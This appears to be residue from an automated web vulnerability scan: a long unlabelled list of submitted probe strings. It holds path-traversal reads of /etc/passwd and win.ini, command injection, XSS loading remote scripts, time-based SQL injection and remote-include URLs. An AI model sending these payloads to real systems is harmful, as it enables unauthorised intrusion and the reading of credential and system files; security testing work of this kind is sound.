1

"|dir

file:///etc/passwd

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

acu7596<s1﹥s2ʺs3ʹuca7596

1

1

1

../../../../../../../../../../windows/win.ini

1

acux6295z1z2abcxuca6295

1

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(999108)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(968993)</script>

1

1

windowswin.ini

1<ScRiPt >prompt(964924)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995973></ScRiPt>

................windowswin.ini

1

1

1

&cat /etc/passwd&

1

response.write(9617478*9087053)

1<ScRiPt >prompt(910683)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

..\..\..\..\..\..\..\..\windows\win.ini

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

'+response.write(9617478*9087053)+'

1

1<video><source onerror="javascript:prompt(950430)">

SomeCustomInjectedHeader:injected_by_wvs

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

"+response.write(9617478*9087053)+"

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(980329)"></g></svg>

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(962268))>

1

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<iframe src='data:text/html

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

`cat /etc/passwd`

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1<body onload=prompt(904498)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(951425)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

|cat /etc/passwd#

WEB-INF/web.xml

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=xyz OnErRor=prompt(976541)>

${99059+99247}

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1

1

1

1&n942664=v933614

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(936658)>

WEB-INF\web.xml

'|'ld

1

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

1<ScRiPt%20>prompt(917636)</sCripT>

-1))

testasp.vulnweb.com

)

1

"|"ld

1

GYF4SWOu'

1

!(()&&!|*|*|

1&lt

/etc/passwd

'"()

g0fAPRqf')

1

1

1

^(#$!@#$)(()))******

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<img acu onmouseover=prompt(987307) //>

vlJOrloX'))

"

1

1

1

1

1

'

1

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(905324)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

${@print(md5(acunetix_wvs_security_test))}\

1

................etc/passwd

"

<a href='http://www.acunetix.com'>website security</a>

1

1

1

http://hit1k7AxCRReD.bxss.me/

-1)

1

1

[url=http://www.acunetix.com]website security[/url]

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

-1))

file:///etc/passwd

1

1_PpdSv <ScRiPt >prompt(992031)</ScRiPt>

1

1

&dir

http://www.acunetix.tst

GRhGpRUF'

'"

1

1'"()&%<ScRiPt >prompt(971838)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

UhCSr5GN')

<!--

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(998515)</ScRiPt>

'&dir&'

comments

response.write(9791945*9005369)

1

1

DgBjOQ5E'))

1

1

'+response.write(9791945*9005369)+'

WEB-INF\web.xml

comments

1_988814

1

"&dir&"

1

1

1

"+response.write(9791945*9005369)+"

comments/.

&cat /etc/passwd&

|dir

1

../../../../../../../../../../windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

'|dir

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../boot.ini

1

1

"|dir

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

acu5171<s1﹥s2ʺs3ʹuca5171

1

1

../../../../../../../../../../windows/win.ini.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

"|dir

"&cat /etc/passwd&"

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu5171<s1﹥s2ʺs3ʹuca5171

SomeCustomInjectedHeader:injected_by_wvs

"|dir

"&cat /etc/passwd&"

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu5171<s1﹥s2ʺs3ʹuca5171

SomeCustomInjectedHeader:injected_by_wvs

"|dir

"&cat /etc/passwd&"

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu5171<s1﹥s2ʺs3ʹuca5171

1

1

../../../../../../../../../../etc/passwd

cat /etc/passwd

1

1

windowswin.ini

1

if(now()=sysdate(),sleep(31.016),0)/*'XOR(if(now()=sysdate(),sleep(31.016),0))OR'"XOR(if(now()=sysdate(),sleep(31.016),0))OR"*/

acux1642z1z2abcxuca1642

1

(select(0)from(select(sleep(62.032)))v)/*'+(select(0)from(select(sleep(62.032)))v)+'"+(select(0)from(select(sleep(62.032)))v)+"*/

1

1

../../../../../../../../../../etc/passwd

cat /etc/passwd

1

1

windowswin.ini

acux1642z1z2abcxuca1642

1

-1

1

1

../../../../../../../../../../etc/passwd

cat /etc/passwd

1

1

windowswin.ini

1

acux1642z1z2abcxuca1642

-1)

1

-1))

1

1

../../../../../../../../../../etc/passwd

cat /etc/passwd

1

1

windowswin.ini

acux1642z1z2abcxuca1642

1

dJG1mQY4'

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

1

................windowswin.ini

1

1<ScRiPt >prompt(958026)</ScRiPt>

20CyOTL3')

1

TY8SaocX'))

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

1

................windowswin.ini

1<ScRiPt >prompt(958026)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

-1

1<script>prompt(939172)</script>

1

../../../../../../../../../../etc/passwd.jpg

1

${99609+99232}

|cat /etc/passwd#

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt >prompt(990689)</ScRiPt>

1&n915504=v936480

'|'ld

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?955386></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

)

fTnvf1rJ'

1<ScRiPt >prompt(933689)</ScRiPt>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

1<video><source onerror="javascript:prompt(903311)">

CM74WxZQ')

1

testasp.vulnweb.com

!(()&&!|*|*|

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(967120)"></g></svg>

bsqnOY7l'))

'

1

^(#$!@#$)(()))******

1

1

WEB-INF/web.xml

/etc/passwd

1<div style=width:expression(prompt(964537))>

1

1

1

1

"

1<iframe src='data:text/html

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

WEB-INF\web.xml

1

'

||cat /etc/passwd

1<body onload=prompt(952608)>

1

1

"

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(966364)>

1

&dir

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1

................etc/passwd

1<img src=xyz OnErRor=prompt(930219)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

'&dir&'

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

1<img/src=">" onerror=alert(902471)>

1

1

acunetix_wvs_invalid_filename

http://hitLM7wGHbESi.bxss.me/

1

"&dir&"

1

file:///etc/passwd

1<ScRiPt%20>prompt(921801)</sCripT>

1

1

1

comments

1

1

1&lt

1

1

1

1

comments

/\../\../\../\../\../\../\../etc/passwd

1

1

<img acu onmouseover=prompt(911388) //>

1

comments/.

1

1

WEB-INF/web.xml

1

1

1

|dir

1<input autofocus onfocus=prompt(976257)>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

WEB-INF\web.xml

1

http://www.acunetix.tst

1

1

'"

<a href='http://www.acunetix.com'>website security</a>

'|dir

1

1

1

1

../../../../../../../../../../windows/win.ini

1

<!--

1

"|dir

1

1

1'"()&%<ScRiPt >prompt(962331)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

'"()&%<ScRiPt >prompt(954214)</ScRiPt>

response.write(9088437*9177960)

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

1

1_940928

'+response.write(9088437*9177960)+'

1_RY26C <ScRiPt >prompt(980319)</ScRiPt>

&cat /etc/passwd&

windowswin.ini

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9088437*9177960)+"

................windowswin.ini

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

..\..\..\..\..\..\..\..\windows\win.ini

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

acu2635<s1﹥s2ʺs3ʹuca2635

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

acux7471z1z2abcxuca7471

`cat /etc/passwd`

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(986034)</ScRiPt>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

1<script>prompt(929589)</script>

${99768+99426}

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n928057=v945451

'|'ld

-1

1

1

1some_inexistent_file_with_long_name%00.jpg

1

WEB-INF/web.xml

1<ScRiPt >prompt(924301)</ScRiPt>

.\./.\./.\./.\./.\./.\./etc/passwd

1

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

1

WEB-INF\web.xml

"|"ld

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?946196></ScRiPt>

!(()&&!|*|*|

testasp.vulnweb.com

-1))

1

/etc/passwd

1

1<ScRiPt >prompt(953503)</ScRiPt>

'"()

1

1

tGV42mJs'

^(#$!@#$)(()))******

1

1<video><source onerror="javascript:prompt(916512)">

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

eBpITgR9')

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944822)"></g></svg>

1

1

1

FrZeCMwb'))

1<div style=width:expression(prompt(900118))>

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1

1<iframe src='data:text/html

1

1

||cat /etc/passwd

1

'

-1)

1<body onload=prompt(944395)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

................etc/passwd

"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(992095)>

1

-1))

&dir

1

1

http://hittwKKgjv8FC.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}

1<img src=xyz OnErRor=prompt(944206)>

1

'&dir&'

acunetix_wvs_invalid_filename

mdsSUYrr'

1

1

${@print(md5(acunetix_wvs_security_test))}\

1<img/src=">" onerror=alert(923642)>

1

1

1

comments

1

cA5K5h7x')

"&dir&"

1<ScRiPt%20>prompt(987590)</sCripT>

file:///etc/passwd

1

1

1

1

comments

E0McGiLE'))

1

1&lt

1

comments/.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

/\../\../\../\../\../\../\../etc/passwd

http://www.acunetix.tst

1

1

1

<img acu onmouseover=prompt(907588) //>

1

1

1

1

1<input autofocus onfocus=prompt(921008)>

|dir

WEB-INF/web.xml

1

1'"()&%<ScRiPt >prompt(992631)</ScRiPt>

'"

1

1

1

'|dir

WEB-INF\web.xml

<a href='http://www.acunetix.com'>website security</a>

1

'"()&%<ScRiPt >prompt(914037)</ScRiPt>

<!--

1

../../../../../../../../../../windows/win.ini

[url=http://www.acunetix.com]website security[/url]

1

1

"|dir

response.write(9222322*9460375)

1_959190

1

1

1_CCf7r <ScRiPt >prompt(918455)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

'+response.write(9222322*9460375)+'

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

"+response.write(9222322*9460375)+"

1

1

&cat /etc/passwd&

1

windowswin.ini

1

1

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

................windowswin.ini

1

../../../../../../../../../../etc/passwd

1

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

..\..\..\..\..\..\..\..\windows\win.ini

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

acu8155<s1﹥s2ʺs3ʹuca8155

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

../../../../../../../../../../etc/passwd.jpg

1

1

acux1261z1z2abcxuca1261

${99026+99780}

1

1

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(929394)</ScRiPt>

1

if(now()=sysdate(),sleep(9.141),0)/*'XOR(if(now()=sysdate(),sleep(9.141),0))OR'"XOR(if(now()=sysdate(),sleep(9.141),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<script>prompt(963519)</script>

1

(select(0)from(select(sleep(9.141)))v)/*'+(select(0)from(select(sleep(9.141)))v)+'"+(select(0)from(select(sleep(9.141)))v)+"*/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1&n912846=v928680

1

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt >prompt(948742)</ScRiPt>

1

-1

1

1

1

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\./.\./.\./.\./.\./.\./etc/passwd

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?911640></ScRiPt>

-1)

WEB-INF/web.xml

)

1

1

testasp.vulnweb.com

1

/etc/passwd

1<ScRiPt >prompt(902172)</ScRiPt>

-1))

WEB-INF\web.xml

'

!(()&&!|*|*|

1

1

1

6dXLZV0r'

1<video><source onerror="javascript:prompt(997199)">

'"()

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

^(#$!@#$)(()))******

"

1

1

x3KWfOKQ')

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(945271)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1<div style=width:expression(prompt(916709))>

RQbyyAG5'))

1

1

1

1

1

1

&dir

................etc/passwd

-1

1<iframe src='data:text/html

1

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1<body onload=prompt(982801)>

1

-1)

'&dir&'

1

"

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(954608)>

-1))

"&dir&"

1

http://hit3ex3qUF0To.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

1

aOFWYCob'

1<img src=xyz OnErRor=prompt(989840)>

file:///etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

|dir

comments

1

1

1<img/src=">" onerror=alert(925652)>

Jbh2Hfc6')

1

/\../\../\../\../\../\../\../etc/passwd

1

1

comments

'|dir

1

1<ScRiPt%20>prompt(925067)</sCripT>

1

1

suG4XKbr'))

WEB-INF/web.xml

1

comments/.

1

"|dir

1&lt

1

WEB-INF\web.xml

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

<img acu onmouseover=prompt(976284) //>

1

http://www.acunetix.tst

1

../../../../../../../../../../windows/win.ini

'"

1

1

1<input autofocus onfocus=prompt(919385)>

1

1

../../../../../../../../../../boot.ini

1

<!--

<a href='http://www.acunetix.com'>website security</a>

1'"()&%<ScRiPt >prompt(960603)</ScRiPt>

1

1

1

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

../../../../../../../../../../windows/win.ini.jpg

1

'"()&%<ScRiPt >prompt(914370)</ScRiPt>

1

1

1_ONz25 <ScRiPt >prompt(995377)</ScRiPt>

response.write(9493006*9944400)

windowswin.ini

1

1_947791

1

1

'+response.write(9493006*9944400)+'

1

1

................windowswin.ini

&cat /etc/passwd&

1

1

1

"+response.write(9493006*9944400)+"

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1

acu5261<s1﹥s2ʺs3ʹuca5261

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

`cat /etc/passwd`

1

1

1

acux2527z1z2abcxuca2527

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

|cat /etc/passwd#

1

../../../../../../../../../../etc/passwd.jpg

${99550+99483}

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<ScRiPt >prompt(978468)</ScRiPt>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

'|'ld

WEB-INF/web.xml

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1<script>prompt(964713)</script>

1&n978274=v993591

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

WEB-INF\web.xml

"|"ld

-1)

1

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt >prompt(969191)</ScRiPt>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

-1))

1

!(()&&!|*|*|

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?984415></ScRiPt>

1

1

ybiPaJDM'

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

^(#$!@#$)(()))******

naadtvQI')

'"()

1<ScRiPt >prompt(905338)</ScRiPt>

1

'

1

1

/etc/passwd

N9WAgJf4'))

1

1

1

1<video><source onerror="javascript:prompt(951779)">

1

1

1

"

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(925732)"></g></svg>

1

||cat /etc/passwd

1

1

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<div style=width:expression(prompt(976510))>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

&dir

1

-1))

1

1

1

'

1<iframe src='data:text/html

1

acunetix_wvs_invalid_filename

dXbG9xWH'

................etc/passwd

1

1

'&dir&'

"

1<body onload=prompt(901386)>

comments

http://hit4OEZjrfTXr.bxss.me/

1

Npsk9Dph')

${@print(md5(acunetix_wvs_security_test))}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(944240)>

comments

1

"&dir&"

1

1

1<img src=xyz OnErRor=prompt(985746)>

1

file:///etc/passwd

E8YprhVd'))

comments/.

${@print(md5(acunetix_wvs_security_test))}\

1

1

|dir

1

1<img/src=">" onerror=alert(921733)>

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1<ScRiPt%20>prompt(951717)</sCripT>

1

'|dir

1

1

http://www.acunetix.tst

1

1&lt

'"

1

1

1

"|dir

1'"()&%<ScRiPt >prompt(917266)</ScRiPt>

1

<!--

1

1

<img acu onmouseover=prompt(983326) //>

1

1

'"()&%<ScRiPt >prompt(904475)</ScRiPt>

1

WEB-INF/web.xml

1

1

1<input autofocus onfocus=prompt(906487)>

1

1

response.write(9263854*9521377)

1

1_953348

WEB-INF\web.xml

1

<a href='http://www.acunetix.com'>website security</a>

'+response.write(9263854*9521377)+'

1

1

[url=http://www.acunetix.com]website security[/url]

"+response.write(9263854*9521377)+"

../../../../../../../../../../windows/win.ini

&cat /etc/passwd&

1_8AH6a <ScRiPt >prompt(948384)</ScRiPt>

1

1

acu6483<s1﹥s2ʺs3ʹuca6483

1

1

../../../../../../../../../../boot.ini

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

acux9336z1z2abcxuca9336

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

../../../../../../../../../../windows/win.ini.jpg

if(now()=sysdate(),sleep(14.297),0)/*'XOR(if(now()=sysdate(),sleep(14.297),0))OR'"XOR(if(now()=sysdate(),sleep(14.297),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<ScRiPt >prompt(953234)</ScRiPt>

1

windowswin.ini

cat /etc/passwd

1

../../../../../../../../../../etc/passwd

(select(0)from(select(sleep(14.297)))v)/*'+(select(0)from(select(sleep(14.297)))v)+'"+(select(0)from(select(sleep(14.297)))v)+"*/

1

1

1

1<script>prompt(903040)</script>

1

`cat /etc/passwd`

................windowswin.ini

-1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

1<ScRiPt >prompt(923751)</ScRiPt>

-1)

|cat /etc/passwd#

1

..\..\..\..\..\..\..\..\windows\win.ini

1

../../../../../../../../../../etc/passwd.jpg

${99633+99305}

1

1

-1))

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?910502></ScRiPt>

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

/.\./.\./.\./.\./.\./.\./windows/win.ini

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

fzx1ir8u'

1&n905558=v929570

1

1

1<ScRiPt >prompt(900684)</ScRiPt>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

jzV4H0mL')

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1some_inexistent_file_with_long_name%00.jpg

"|"ld

1

1<video><source onerror="javascript:prompt(946335)">

b6FhRWaG'))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

-1

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(934662)"></g></svg>

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

-1)

!(()&&!|*|*|

1<div style=width:expression(prompt(914550))>

'

testasp.vulnweb.com

'"()

1

^(#$!@#$)(()))******

WEB-INF/web.xml

/etc/passwd

1

-1))

1<iframe src='data:text/html

"

1

1

1

1

1<body onload=prompt(931568)>

WEB-INF\web.xml

hrFOmdw0'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

||cat /etc/passwd

1

1

sQ3V6ltU')

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(902500)>

1

hy7DdZKn'))

&dir

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<img src=xyz OnErRor=prompt(962503)>

1

1

1

1

'&dir&'

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

................etc/passwd

1<img/src=">" onerror=alert(990192)>

1

1

"

1

1

1

"&dir&"

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

1<ScRiPt%20>prompt(964872)</sCripT>

1

1

1

http://hitEQOWPquA9u.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

comments

1&lt

1

|dir

1

1

<img acu onmouseover=prompt(964192) //>

1

file:///etc/passwd

comments

1

1<input autofocus onfocus=prompt(978493)>

1

1

1

'|dir

<a href='http://www.acunetix.com'>website security</a>

/\../\../\../\../\../\../\../etc/passwd

comments/.

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"|dir

'"

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

WEB-INF/web.xml

<!--

1

1_f9EaV <ScRiPt >prompt(936177)</ScRiPt>

1

1

1

1

WEB-INF\web.xml

1

1

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1'"()&%<ScRiPt >prompt(960098)</ScRiPt>

1

1

&cat /etc/passwd&

1

1

1

response.write(9624416*9438526)

1

../../../../../../../../../../boot.ini

1

1

'"()&%<ScRiPt >prompt(903333)</ScRiPt>

1

1

1

'&cat /etc/passwd&'

'+response.write(9624416*9438526)+'

1_922527

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../windows/win.ini.jpg

"&cat /etc/passwd&"

"+response.write(9624416*9438526)+"

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

windowswin.ini

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

................windowswin.ini

1

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

..\..\..\..\..\..\..\..\windows\win.ini

`cat /etc/passwd`

acu8806<s1﹥s2ʺs3ʹuca8806

${100196+99105}

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

if(now()=sysdate(),sleep(10.923),0)/*'XOR(if(now()=sysdate(),sleep(10.923),0))OR'"XOR(if(now()=sysdate(),sleep(10.923),0))OR"*/

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

|cat /etc/passwd#

1

acux10996z1z2abcxuca10996

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(10.923)))v)/*'+(select(0)from(select(sleep(10.923)))v)+'"+(select(0)from(select(sleep(10.923)))v)+"*/

)

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1<ScRiPt >prompt(972795)</ScRiPt>

1&n963894=v924354

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

